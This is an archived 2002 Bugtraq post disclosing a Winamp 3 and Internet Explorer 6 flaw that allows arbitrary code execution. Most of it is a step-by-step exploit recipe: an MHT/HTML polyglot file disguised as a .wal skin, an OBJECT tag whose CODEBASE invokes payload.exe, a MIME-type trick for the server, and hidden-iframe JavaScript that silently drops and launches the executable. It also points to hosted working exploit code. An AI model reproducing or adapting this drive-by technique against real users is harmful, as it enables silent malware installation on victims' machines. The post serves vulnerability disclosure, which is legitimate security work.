Bugtraq mailing list archives
RETRY : newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6
From: "Jelmer" <jelmer () kuperus xs4all nl>
Date: Sat, 17 Aug 2002 20:36:17 +0200
This one was missed by security focus . Lets try again -- jelmer ----- Original Message ----- From: "Jelmer" <jelmer () kuperus xs4all nl> To: <bugtraq () securityfocus com> Sent: Sunday, August 11, 2002 1:28 AM Subject: newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6
For those of you who have been living under a rock winamp 3 final was released today It features freeform skins, now plays video's, allows you to manage your mp3's and a lot more Unfortunatly they failed to adress a pretty serious arbitrary code
execution
vulnerability when combined with Internet explorer that I reporteded to them and this list earlier
concerning
winamp 2. I haven't heard from them since Winamp 3 uses a new skinning system that uses the .wal extention, this
skin
type is also opened automaticly in MSIE, it doesn't prompt for download and stores the file in a known location on the users harddisk namely C:\Program Files\Winamp3\Skins (when installed in the default location like most people do) Working Exploit code is available at http://kuperus.xs4all.nl/winamp3.htm Note that this version DOES NOT use any unpatched MSIE hole to invoke the executable and it will continue to work even after microsoft patches its browser As i understand it this is just the way the object tag behaves in the
local
zone. (wich seems very very dangerous to me) I also updated the winamp2 exploit code at http://kuperus.xs4all.nl/winamp.htm Ok to encourrage winamp/aol to take their customers security a bit more serious here's "the recipe" to how its done. It's kind of "http-equivesq" in length and obscurity and may not be for
the
faint of heart. Its written from the top of my head, so please forgive me if i missed a brace or dot here and there, here goes. create a directory c:\exploit place an exe file in it, lets call it payload.exe then create a file called exploit.htm and give it the following contents <html> <body> <img src="payload.exe"> </body> </html> open the file in internet explorer, choose file > save as, and save it as exploit.mht open it in notepad and add the following line to the top <html style="display:none;"> so it looks like this : <html style="display:none;"> From: <Saved by Microsoft Internet Explorer 5> Subject: Date: Mon, 5 Aug 2002 18:30:03 +0200 MIME-Version: 1.0 Then look for the body section of this html document (it looks a little mangled) delete everything between the body tags and place an object tag in its place, so it looks like this <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD> <BODY> <OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="mhtml:file:///C:/Program%20Files/winamp3/Skins/amp.wal!file:///c:/
exploit/payload.exe"></OBJECT> </BODY></HTML> this is the code that will later be used to invoke our executable What we have done is we have slightly altered the mht file so that it can
be
vieuwed both as html and as mht file. files starting with an <html> tag are always seen as html files in
internet
explorer. (wich can be a pain as will be descibed as followed) ok we are set to go, now we want to place this on the users harddisk. We know wal files are opened automaticly by winamp3 and placed in a known location so we'll rename our exploit.mht file to wal unfortunatly internet explorer disrespects mime types so by having added a <html> tag to the mht file it tries top open it as an <html> file the only way i found around this is to set the mime type to a value MSIE doesn't know. I chose x-foo/x-bar If you are using apache you can add the following to your mime.types file x-foo/x-bar wal this means that the webserver will pass this mime type along with every
file
requested ending in .wal when we now request this file it will be opened by winamp3 and an errormessage will follow shortly, however at that time it is allready too late, our exploit.wal file has
been
placed in C:\Program Files\Winamp3\Skins\exploit.wal now all that remains is bringing it together by making the following sequence of events occur 1. download our exploit.wal 2. wait a few seconds for it to finish downloading then call exploit.wal
as
html file (the file also doubles as mht file and the object tag included
in
the html portion points to itself as the codebase) here's the code for this <html> <body> Waiting for 5 seconds.. <!-- download our renamed mht file and place it on the users disk --> <iframe src="amp.wal" style="display:none"></iframe> <script language="javascript"> //wait for 5 seconds setTimeout("ExecuteFile()",5000); function ExecuteFile() { // open the saved wal file as html file // oddly when called from disk it didn't open it as html file so we need
to
force this behaviour by using a modeless dialog sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal'; sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px; dialogheight: 0px; status:no; unadorned:yes; help:no'; vReturnValue = window.showModelessDialog(sHTML, '', sFeatures) } </script> </body> </html> have fun -- jelmer
Current thread:
- RETRY : newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6 Jelmer (Aug 17)